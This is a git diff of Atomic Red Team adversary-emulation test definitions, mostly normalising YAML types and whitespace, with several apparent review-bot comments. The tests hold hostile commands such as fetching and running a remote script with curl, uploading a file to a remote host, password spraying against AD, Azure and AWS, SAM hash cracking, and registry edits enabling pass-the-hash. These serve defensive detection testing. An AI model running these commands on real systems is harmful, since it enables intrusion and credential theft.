@@ -447,24 +447,24 @@ atomic_tests: input_arguments: file_download: description: File to download - type: String + type: string default: https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll curl_path: description: path to curl.exe - type: Path + type: path default: C:\Windows\System32\Curl.exe - dependency_executor_name: powershell - dependencies: - - description: | - Curl must be installed on system. - prereq_command: | - if (Test-Path #{curl_path}) {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip + dependency_executor_name: powershell + dependencies: + - description: | + Curl must be installed on system. + prereq_command: | + if (Test-Path #{curl_path}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip + Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl + Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe + Remove-Item $env:temp\curl + Remove-Item $env:temp\curl.zip executor: command: | #{curl_path} -k #{file_download} -o c:\users\public\music\allthethingsx64.dll 
@@ -488,34 +488,34 @@ atomic_tests: input_arguments: curl_path: description: path to curl.exe - type: Path + type: path default: C:\Windows\System32\Curl.exe remote_destination: description: Remote destination - type: String + type: string default: www.example.com file_path: description: File to upload - type: String + type: string default: c:\temp\atomictestfile.txt - dependency_executor_name: powershell - dependencies: - - description: | - Curl must be installed on system. - prereq_command: | - if (Test-Path #{curl_path}) {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip - - description: | - A file must be created to upload - prereq_command: | - if (Test-Path #{file_path}) {exit 0} else {exit 1} - get_prereq_command: | - echo "This is an Atomic Test File" > #{file_path} + dependency_executor_name: powershell + dependencies: + - description: | + Curl must be installed on system. + prereq_command: | + if (Test-Path #{curl_path}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest “https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip” -Outfile $env:temp\curl.zip + Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl + Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe + Remove-Item $env:temp\curl + Remove-Item $env:temp\curl.zip + - description: | + A file must be created to upload + prereq_command: | + if (Test-Path #{file_path}) {exit 0} else {exit 1} + get_prereq_command: | + echo "This is an Atomic Test File" > #{file_path} executor: command: | #{curl_path} -T #{file_path} #{remote_destination} 
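Review bot: The re-indented `get_prereq_command` in this hunk still wraps the curl download URL in Unicode curly quotes (“…”) rather than straight ASCII quotes; PowerShell happens to accept them as string delimiters, but the sibling curl test in the previous hunk uses `"https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip"`, and the curly form breaks on copy/paste into any other shell or editor. Since the line is being rewritten anyway, normalise it to `Invoke-WebRequest "https://curl.se/windows/dl-7.79.1/curl-7.79.1-win64-mingw.zip" -Outfile $env:temp\curl.zip`. Separately, both curl prereqs copy a freshly downloaded binary into `C:\Windows\System32` with no integrity check on the archive; a comment such as `# NOTE: archive is not hash-verified before being placed in System32` would at least make that explicit for operators.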
@@ -524,7 +524,7 @@ atomic_tests: #{curl_path} --data #{file_path} #{remote_destination} name: command_prompt -- name: Download a file with Microsoft Connection Manager Auto-Download +- name: Download a file with Microsoft Connection Manager Auto-Download auto_generated_guid: d239772b-88e2-4a2e-8473-897503401bcc description: | Uses the cmdl32 to download arbitrary file from the internet. The cmdl32 package is allowed to install the profile used to launch the VPN connection. However, the config is modified to download the arbitary file. @@ -536,14 +536,14 @@ atomic_tests: https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/ https://strontic.github.io/xcyclopedia/library/cmdl32.exe-FA1D5B8802FFF4A85B6F52A52C871BBB.html supported_platforms: - - windows + - windows input_arguments: Path_to_file: description: Path to the Batch script - type: Path + type: path default: PathToAtomicsFolder\T1105\src\T1105.bat - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | #{Path_to_file} must exist on system. prereq_command: | @@ -574,11 +574,11 @@ atomic_tests: default: $env:comspec exe_remote_folder: description: Path to store executable on remote machine (no drive letter) - type: String + type: string default: \Windows\Temp\T1105.exe remote_drive_letter: description: Remote drive letter - type: String + type: string default: C dependency_executor_name: powershell dependencies: @@ -621,15 +621,15 @@ atomic_tests: description: | Create a ZIP file from a folder in a remote drive supported_platforms: - - windows + - windows input_arguments: Path_unc: description: Path to the UNC folder - type: Path + type: path default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\ Path_PrintBrm: description: Path to PrintBrm.exe - type: Path + type: path default: C:\Windows\System32\spool\tools\PrintBrm.exe executor: command: | 
@@ -645,18 +645,18 @@ atomic_tests: Copy file.cab to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/ supported_platforms: - - windows + - windows input_arguments: replace_cab: description: Path to the cab file - type: Path - default: PathToAtomicsFolder\T1105\src\redcanary.cab + type: path + default: PathToAtomicsFolder\T1105\src\redcanary.cab Path_replace: description: Path to replace.exe - type: Path + type: path default: C:\Windows\System32\replace.exe - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | #{replace_cab} must exist on system. prereq_command: | @@ -678,15 +678,15 @@ atomic_tests: Copy UNC file to destination Reference: https://lolbas-project.github.io/lolbas/Binaries/Replace/ supported_platforms: - - windows + - windows input_arguments: replace_cab: description: UNC Path to the cab file - type: Path - default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab + type: path + default: \\127.0.0.1\c$\AtomicRedTeam\atomics\T1105\src\redcanary.cab Path_replace: description: Path to replace.exe - type: Path + type: path default: C:\Windows\System32\replace.exe executor: command: | @@ -704,7 +704,7 @@ atomic_tests: input_arguments: local_path: description: Local path to place file - type: String + type: string default: '%temp%\Atomic-license.txt' remote_file: description: URL of file to copy @@ -723,10 +723,10 @@ atomic_tests: input_arguments: vbscript_file: description: Full path to the VisualBasic downloading the file - type: String + type: string default: PathToAtomicsFolder\T1105\src\T1105-download-file.vbs - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | #{vbscript_file} must be exist on system. prereq_command: | 
@@ -743,16 +743,16 @@ atomic_tests: description: | Utilize linux Curl to download a remote file, chmod +x it and run it. supported_platforms: - - linux + - linux input_arguments: remote_url: description: url of remote payload type: string - default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh payload_name: description: payload name type: string - default: atomic.sh + default: atomic.sh executor: command: | curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name} @@ -768,15 +768,15 @@ atomic_tests: input_arguments: remote_file: description: URL of file to copy - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt destination_path: description: Destination path to file - type: Path + type: path default: $env:TEMP\Atomic-license.txt local_nimgrab: description: Local path to nimgrab - type: Path + type: path default: $env:TEMP\nimgrab.exe executor: command: | 
@@ -784,32 +784,32 @@ atomic_tests: cleanup_command: | del #{destination_path} >nul 2>&1 name: command_prompt - dependency_executor_name: powershell - dependencies: - - description: | - NimGrab must be installed on system. - prereq_command: | - if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip - Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim -Force - Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab} - Remove-Item $env:temp\nim - Remove-Item $env:temp\nim.zip -- name: iwr or Invoke Web-Request download + dependency_executor_name: powershell + dependencies: + - description: | + NimGrab must be installed on system. + prereq_command: | + if (Test-Path "#{local_nimgrab}") {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://nim-lang.org/download/nim-1.6.6_x64.zip" -Outfile $env:temp\nim.zip + Expand-Archive -Path $env:temp\nim.zip -DestinationPath $env:temp\nim -Force + Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab} + Remove-Item $env:temp\nim + Remove-Item $env:temp\nim.zip +- name: iwr or Invoke Web-Request download auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279 - description: | + description: | Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions. supported_platforms: - windows input_arguments: remote_file: description: URL of file to copy - type: Url + type: url default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt local_path: description: Local path to place file - type: Path + type: path default: '%temp%\Atomic-license.txt' executor: command: | diff --git a/atomics/T1106/T1106.yaml b/atomics/T1106/T1106.yaml index 5801df95..36b7fb1b 100644 --- a/atomics/T1106/T1106.yaml +++ b/atomics/T1106/T1106.yaml 
@@ -9,14 +9,14 @@ atomic_tests: input_arguments: source_file: description: Location of the CSharp source file to compile and execute - type: Path + type: path default: PathToAtomicsFolder\T1106\src\CreateProcess.cs output_file: description: Location of the payload - type: Path + type: path default: '%tmp%\T1106.exe' - dependency_executor_name: powershell - dependencies: + dependency_executor_name: powershell + dependencies: - description: | #{source_file} must exist on system. prereq_command: | diff --git a/atomics/T1110.001/T1110.001.yaml b/atomics/T1110.001/T1110.001.yaml index 9510f0d3..d9934aa3 100644 --- a/atomics/T1110.001/T1110.001.yaml +++ b/atomics/T1110.001/T1110.001.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: user: description: Account to bruteforce - type: String + type: string default: '%username%' executor: name: command_prompt @@ -31,19 +31,19 @@ atomic_tests: input_arguments: user: description: Account to bruteforce - type: String + type: string default: $ENV:USERNAME passwords_path: description: List of passwords we will attempt to brute force with - type: Path + type: path default: PathToAtomicsFolder\T1110.001\src\passwords.txt domain: description: Active Directory domain FQDN - type: String + type: string default: $env:UserDnsDomain auth: description: authentication method to choose between "NTLM" and "Kerberos" - type: String + type: string default: NTLM executor: name: powershell @@ -81,11 +81,11 @@ atomic_tests: input_arguments: username: description: Account to bruteforce. We encourage users running this atomic to add a valid microsoft account domain; for eg "bruce.wayne@" - type: String + type: string default: bruce.wayne@contoso.com passwords: description: List of passwords we will attempt to brute force with - type: String + type: string default: Password1`n1q2w3e4r`nPassword! dependency_executor_name: powershell dependencies: 
@@ -125,7 +125,7 @@ atomic_tests: If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers. The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers" supported_platforms: - - linux + - linux dependency_executor_name: sh dependencies: - description: | @@ -152,7 +152,7 @@ atomic_tests: description: | Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution. supported_platforms: - - linux + - linux dependency_executor_name: sh dependencies: - description: | @@ -165,7 +165,7 @@ atomic_tests: get_prereq_command: | yum -y update && yum install -y openssl sudo executor: - elevation_required: true + elevation_required: true command: | useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target su target @@ -189,18 +189,18 @@ atomic_tests: name: sh - name: Password Brute User using Kerbrute Tool auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 - description: | + description: | Bruteforce a single user's password from a wordlist supported_platforms: - windows input_arguments: domaincontroller: description: Domain controller where test will be run - type: String + type: string default: $ENV:userdnsdomain domain: description: Domain where you will be testing - type: String + type: string default: $ENV:userdomain dependency_executor_name: powershell dependencies: diff --git a/atomics/T1110.002/T1110.002.yaml b/atomics/T1110.002/T1110.002.yaml index dc4eeaba..68a39ce0 100644 --- a/atomics/T1110.002/T1110.002.yaml +++ b/atomics/T1110.002/T1110.002.yaml 
@@ -9,15 +9,15 @@ atomic_tests: input_arguments: hashcat_exe: description: Path to Hashcat executable - type: String + type: string default: '%temp%\hashcat6\hashcat-6.1.1\hashcat.exe' input_file_sam: description: Path to SAM file - type: String + type: string default: PathToAtomicsFolder\T1110.002\src\sam.txt input_file_passwords: description: Path to password list - type: String + type: string default: PathToAtomicsFolder\T1110.002\src\password.lst dependency_executor_name: powershell dependencies: diff --git a/atomics/T1110.003/T1110.003.yaml b/atomics/T1110.003/T1110.003.yaml index 96571458..6ba5912b 100644 --- a/atomics/T1110.003/T1110.003.yaml +++ b/atomics/T1110.003/T1110.003.yaml @@ -18,7 +18,7 @@ atomic_tests: input_arguments: password: description: The password to try for each user in users.txt - type: String + type: string default: Spring2020 dependencies: - description: | @@ -39,11 +39,11 @@ atomic_tests: https://github.com/dafthack/DomainPasswordSpray supported_platforms: - - windows + - windows input_arguments: domain: description: Domain to brute force against - type: String + type: string default: $Env:USERDOMAIN executor: name: powershell @@ -62,15 +62,15 @@ atomic_tests: input_arguments: password: description: single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001) - type: String + type: string default: P@ssw0rd! domain: description: Domain FQDN - type: String + type: string default: $env:UserDnsDomain auth: description: authentication method to choose between "NTLM" and "Kerberos" - type: String + type: string default: NTLM executor: name: powershell 
@@ -102,7 +102,7 @@ atomic_tests: } } Write-Host "End of password spraying" -- name: Password spray all Azure AD users with a single password +- name: Password spray all Azure AD users with a single password auto_generated_guid: a8aa2d3e-1c52-4016-bc73-0f8854cfa80a description: | Attempt to brute force all Azure AD users with a single password (called "password spraying") via AzureAD Powershell module. @@ -112,15 +112,15 @@ atomic_tests: input_arguments: password: description: Single password we will attempt to auth with (if you need several passwords, then it is a bruteforce so see T1110.001) - type: String + type: string default: P@ssw0rd! valid_username: description: Valid username to retrieve Azure AD users. We encourage users running this atomic to add a valid microsoft account domain; for eg @ - type: String + type: string default: bruce.wayne@contoso.com valid_password: description: Valid password to authenticate as valid_username in the - type: String + type: string default: iamthebatman dependency_executor_name: powershell dependencies: @@ -176,15 +176,15 @@ atomic_tests: This atomic test will attempt a single password against all users in a password list at $env:Temp\usersdpsLight.txt. You can create this file manually or with the automated prereq_command. The prereq_command will limit the user list to 200 users by default to help you avoid massive account lockout. supported_platforms: - - windows + - windows input_arguments: user_limit: description: The max number of users to put in the list when running the prereq_command - type: Integer + type: integer default: 200 password: description: The password to try for each user in users.txt - type: String + type: string default: Spring2020 dependencies: - description: | 
@@ -233,11 +233,11 @@ atomic_tests: input_arguments: password: description: Single password to try against the list of user accounts - type: String + type: string default: P@ssword1 user_list: description: File path to list of users (one per line, formatted as user@subdomain.onmicrosoft.com) - type: String + type: string default: $env:temp\T1110.003UserList.txt dependency_executor_name: powershell dependencies: @@ -255,18 +255,18 @@ atomic_tests: Invoke-MSOLSpray -UserList "#{user_list}" -Password "#{password}" - name: Password Spray using Kerbrute Tool auto_generated_guid: c6f25ec3-6475-47a9-b75d-09ac593c5ecb - description: | + description: | Test a single password against a list of users supported_platforms: - windows input_arguments: domaincontroller: description: Domain controller where test will be run - type: String + type: string default: $ENV:userdnsdomain domain: description: Domain where you will be testing - type: String + type: string default: $ENV:userdomain dependency_executor_name: powershell dependencies: 
@@ -297,22 +297,22 @@ atomic_tests: input_arguments: aws_account_id: description: ID of the AWS account - type: String + type: string default: "XXXXXXXX" dependencies: - - description: | - Check if go is installed - prereq_command: | - go version - get_prereq_command: | - echo Install GO + - description: | + Check if go is installed + prereq_command: | + go version + get_prereq_command: | + echo Install GO executor: command: | - cd /tmp - git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git - cd /tmp/GoAWSConsoleSpray - go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt + cd /tmp + git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git + cd /tmp/GoAWSConsoleSpray + go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt cleanup_command: | - rm -rf /tmp/GoAWSConsoleSpray + rm -rf /tmp/GoAWSConsoleSpray name: sh - elevation_required: false \ No newline at end of file + elevation_required: false diff --git a/atomics/T1110.004/T1110.004.yaml b/atomics/T1110.004/T1110.004.yaml index 22d3c5ec..df4c510e 100644 --- a/atomics/T1110.004/T1110.004.yaml +++ b/atomics/T1110.004/T1110.004.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1110.004 display_name: 'Brute Force: Credential Stuffing' 
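Review bot: The re-indented executor clones with `git clone git@github.com:WhiteOakSecurity/GoAWSConsoleSpray.git`, an SSH transport that needs a GitHub-registered key and an accepted host key, so on a stock test host the clone fails and the following `cd /tmp/GoAWSConsoleSpray` and `go run` still execute against a missing directory. An https URL with `&&` chaining is the unattended-friendly form: `git clone https://github.com/WhiteOakSecurity/GoAWSConsoleSpray.git /tmp/GoAWSConsoleSpray && cd /tmp/GoAWSConsoleSpray && go run main.go GoAWSConsoleSpray -a #{aws_account_id} -u PathToAtomicsFolder/T1110.003/src/aws_users.txt -p PathToAtomicsFolder/T1110.003/src/aws_passwords.txt`. The `get_prereq_command` above it only prints `echo Install GO` and does not actually satisfy the `go version` prereq, which is presumably intentional but worth a comment.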
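Review bot: The T1110.004 hunk removes the leading `---` document-start marker from T1110.004.yaml, which is the opposite direction from the normalisation the rest of this commit applies and is flagged by yamllint's `document-start` rule. None of the other file sections visible here drop their marker, so this looks like an accidental deletion rather than a policy change; I would keep the `---` line unless the intent is to remove it across all atomics files.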
@@ -9,22 +8,22 @@ atomic_tests: Using username,password combination from a password dump to login over SSH. supported_platforms: - - linux + - linux input_arguments: target_host: description: IP Address / Hostname you want to target. - type: String + type: string default: localhost dependency_executor_name: bash dependencies: - - description: | - Requires SSHPASS - prereq_command: | - if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - get_prereq_command: | - if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; + - description: | + Requires SSHPASS + prereq_command: | + if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo "This test requires sshpass" ; fi ; executor: name: bash 
@@ -39,23 +38,23 @@ atomic_tests: Using username,password combination from a password dump to login over SSH. supported_platforms: - - macos + - macos input_arguments: target_host: description: IP Address / Hostname you want to target. - type: String + type: string default: localhost dependency_executor_name: bash dependencies: - - description: | - Requires SSHPASS - prereq_command: | - if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; - get_prereq_command: | - /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)" - brew install hudochenkov/sshpass/sshpass + - description: | + Requires SSHPASS + prereq_command: | + if [ -x "$(command -v sshpass)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)" + brew install hudochenkov/sshpass/sshpass executor: name: bash @@ -66,18 +65,18 @@ atomic_tests: - name: Brute Force:Credential Stuffing using Kerbrute Tool auto_generated_guid: 4852c630-87a9-409b-bb5e-5dc12c9ebcde - description: | + description: | Will read username and password combos from a file or stdin (format username:password) and perform a bruteforce attack supported_platforms: - windows input_arguments: domaincontroller: description: Domain controller where test will be run - type: String + type: string default: $ENV:userdnsdomain domain: description: Domain where you will be testing - type: String + type: string default: $ENV:userdomain dependency_executor_name: powershell dependencies: 
@@ -93,7 +92,7 @@ atomic_tests: if (test-path $env:temp\bruteforce.txt){exit 0} else {exit 1} get_prereq_command: | invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/src/bruteforce.txt?raw=true" -outfile "$env:temp\bruteforce.txt" - executor: + executor: name: powershell elevation_required: false command: | diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index 00da411e..dc55d583 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -25,7 +25,7 @@ atomic_tests: input_arguments: new_executable: description: New executable to run on startup instead of Windows Defender - type: String + type: string default: calc.exe executor: command: | @@ -62,7 +62,7 @@ atomic_tests: input_arguments: bad_domain: description: Domain to add to trusted site zone - type: String + type: string default: bad-domain.com executor: command: | @@ -99,7 +99,7 @@ atomic_tests: input_arguments: default_execution_policy: description: Specify the default poweshell execution policy - type: String + type: string default: Default executor: command: | @@ -225,7 +225,7 @@ atomic_tests: reg delete "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v shutdownwithoutlogon /f >nul 2>&1 name: command_prompt elevation_required: true -- name: Disable Windows LogOff Button +- name: Disable Windows LogOff Button auto_generated_guid: e246578a-c24d-46a7-9237-0213ff86fb0c description: | Modify the registry of the currently logged in user using reg.exe via cmd console to disable the windows logoff button. @@ -343,7 +343,7 @@ atomic_tests: cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFileMenu /f >nul 2>&1 name: command_prompt - elevation_required: true + elevation_required: true - name: Activate Windows NoClose Group Policy Feature auto_generated_guid: 12f50e15-dbc6-478b-a801-a746e8ba1723 description: | 
@@ -358,7 +358,7 @@ atomic_tests: cleanup_command: | reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /f >nul 2>&1 name: command_prompt - elevation_required: true + elevation_required: true - name: Activate Windows NoSetTaskbar Group Policy Feature auto_generated_guid: d29b7faf-7355-4036-9ed3-719bd17951ed description: | @@ -622,8 +622,8 @@ atomic_tests: - name: Ursnif Malware Registry Key Creation auto_generated_guid: c375558d-7c25-45e9-bd64-7b23a97c1db0 description: | - Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\ - More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/ + Ursnif downloads additional modules from the C&C server and saves these in the registry folder HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\ + More information - https://blog.trendmicro.com/trendlabs-security-intelligence/phishing-campaign-uses-hijacked-emails-to-deliver-ursnif-by-replying-to-ongoing-threads/ supported_platforms: - windows executor: @@ -636,7 +636,7 @@ atomic_tests: - name: Terminal Server Client Connection History Cleared auto_generated_guid: 3448824b-3c35-4a9e-a8f5-f887f68bea21 description: | - The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer + The built-in Windows Remote Desktop Connection (RDP) client (mstsc.exe) saves the remote computer name (or IP address) and the username that is used to login after each successful connection to the remote computer supported_platforms: - windows dependency_executor_name: powershell 
@@ -696,7 +696,7 @@ atomic_tests: auto_generated_guid: fe7974e5-5813-477b-a7bd-311d4f535e83 description: | Enabling Restricted Admin Mode via Command_Prompt,enables an attacker to perform a pass-the-hash attack using RDP. - + See [Passing the Hash with Remote Desktop](https://www.kali.org/blog/passing-hash-remote-desktop/) supported_platforms: - windows @@ -734,4 +734,4 @@ atomic_tests: cleanup_command: | reg delete "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /f >nul 2>&1 name: command_prompt - elevation_required: true + elevation_required: true diff --git a/atomics/T1113/T1113.yaml b/atomics/T1113/T1113.yaml index fd54b103..1832a6bc 100644 --- a/atomics/T1113/T1113.yaml +++ b/atomics/T1113/T1113.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: output_file: description: Output file path - type: Path + type: path default: /tmp/T1113_desktop.png executor: command: | @@ -27,7 +27,7 @@ atomic_tests: input_arguments: output_file: description: Output file path - type: Path + type: path default: /tmp/T1113_desktop.png executor: command: | @@ -44,15 +44,15 @@ atomic_tests: input_arguments: output_file: description: Output file path - type: Path + type: path default: /tmp/T1113_desktop.xwd package_checker: description: Package checking command for linux. Debian system command- dpkg -s x11-apps - type: String + type: string default: rpm -q xorg-x11-apps package_installer: description: Package installer command for linux. Debian system command- apt-get install x11-apps - type: String + type: string default: yum install -y xorg-x11-apps dependency_executor_name: bash dependencies: @@ -78,7 +78,7 @@ atomic_tests: input_arguments: output_file: description: Output file path - type: Path + type: path default: /tmp/T1113_desktop.png dependencies: - description: | 
@@ -98,15 +98,15 @@ atomic_tests: description: | Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour supported_platforms: - - windows + - windows input_arguments: output_file: description: Output file path - type: Path + type: path default: c:\temp\T1113_desktop.zip recording_time: description: Time to take screenshots - type: String + type: string default: 5 executor: name: powershell @@ -129,7 +129,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: $env:TEMP\T1113.png executor: command: | diff --git a/atomics/T1114.001/T1114.001.yaml b/atomics/T1114.001/T1114.001.yaml index 087e4d82..9ae41060 100644 --- a/atomics/T1114.001/T1114.001.yaml +++ b/atomics/T1114.001/T1114.001.yaml @@ -13,11 +13,11 @@ atomic_tests: input_arguments: output_file: description: Output file path - type: String + type: string default: $env:TEMP\mail.csv file_path: description: File path for Get-Inbox.ps1 - type: String + type: string default: PathToAtomicsFolder\T1114.001\src dependency_executor_name: powershell dependencies: @@ -33,4 +33,3 @@ atomic_tests: cleanup_command: | Remove-Item #{output_file} -Force -ErrorAction Ignore name: powershell - diff --git a/atomics/T1114.003/T1114.003.yaml b/atomics/T1114.003/T1114.003.yaml index 7c6ed413..bcfb52de 100644 --- a/atomics/T1114.003/T1114.003.yaml +++ b/atomics/T1114.003/T1114.003.yaml 
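Review bot: In the T1113 Psr.exe test, `recording_time` now declares `type: string` while its default stays as the unquoted plain scalar `default: 5`, which a YAML loader parses as an integer; the declared type and the loaded type disagree. Either quote the value, `default: "5"`, or declare `type: integer` to match the other numeric arguments in this commit (e.g. `user_limit` and `duration`). Which one is right depends on how the executor substitutes `#{recording_time}`, which is outside the hunk.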
@@ -10,19 +10,19 @@ atomic_tests: input_arguments: username: description: office-365 username - type: String - default: null + type: string + default: password: description: office-365 password - type: String - default: null + type: string + default: rule_name: description: email rule name - type: String + type: string default: "Atomic Red Team Email Rule" forwarding_email: description: destination email addresses - type: String + type: string default: "Atomic_Operator@fakeemail.aq" dependency_executor_name: powershell dependencies: diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml index 0e64b40a..96a03ae5 100644 --- a/atomics/T1115/T1115.yaml +++ b/atomics/T1115/T1115.yaml @@ -45,7 +45,7 @@ atomic_tests: input_arguments: ms_product: description: Maldoc application Word - type: String + type: string default: Word dependency_executor_name: powershell dependencies: @@ -80,4 +80,4 @@ atomic_tests: apt install xclip -y history | tail -n 30 | xclip -sel clip xclip -o > history.txt - name: sh \ No newline at end of file + name: sh diff --git a/atomics/T1123/T1123.yaml b/atomics/T1123/T1123.yaml index 8018a1bf..79459a80 100644 --- a/atomics/T1123/T1123.yaml +++ b/atomics/T1123/T1123.yaml 
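Review bot: The T1114.003 hunk replaces `default: null` with a bare `default:` for the office-365 `username` and `password` arguments; both load as YAML null, but the bare form is ambiguous to readers (empty string vs. no value) and is what yamllint's `empty-values` rule warns about. If the intent is "no default, the operator must supply it", keep it explicit with `default: null`, or use `default: ""` if an empty string is what the executor expects. Leaving credential arguments explicitly null also makes it obvious that no placeholder secret is committed.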
@@ -29,26 +29,26 @@ atomic_tests: - name: using Quicktime Player auto_generated_guid: c7a0bb71-70ce-4a53-b115-881f241b795b description: | - Use AppleScript to get Quicktime Player to record an audio file from the default microphone. + Use AppleScript to get Quicktime Player to record an audio file from the default microphone. - Should create a non-empty m4a file with sound from the microphone. + Should create a non-empty m4a file with sound from the microphone. - - requires Automation permissions but no additional microphone permissions - - saves file in /tmp by default. Other locations likely to require more permissions. + - requires Automation permissions but no additional microphone permissions + - saves file in /tmp by default. Other locations likely to require more permissions. supported_platforms: - macos input_arguments: filename: description: Location of the script - type: Path + type: path default: PathToAtomicsFolder/T1123/src/T1123.sh audiofile: description: Location of the recorded audio file - type: Path + type: path default: /tmp/T1123.m4a duration: description: Length of recording to make in seconds - type: Integer + type: integer default: 5 executor: command: | @@ -57,4 +57,4 @@ atomic_tests: if test -w #{audiofile}; then rm #{audiofile} fi - name: sh \ No newline at end of file + name: sh diff --git a/atomics/T1124/T1124.yaml b/atomics/T1124/T1124.yaml index 0d63951d..5197f5a1 100644 --- a/atomics/T1124/T1124.yaml +++ b/atomics/T1124/T1124.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: computer_name: description: computer name to query - type: String + type: string default: localhost executor: command: | @@ -32,7 +32,7 @@ atomic_tests: description: | Identify system time. Upon execution, the local computer system time and timezone will be displayed. supported_platforms: - - macos + - macos executor: command: | date diff --git 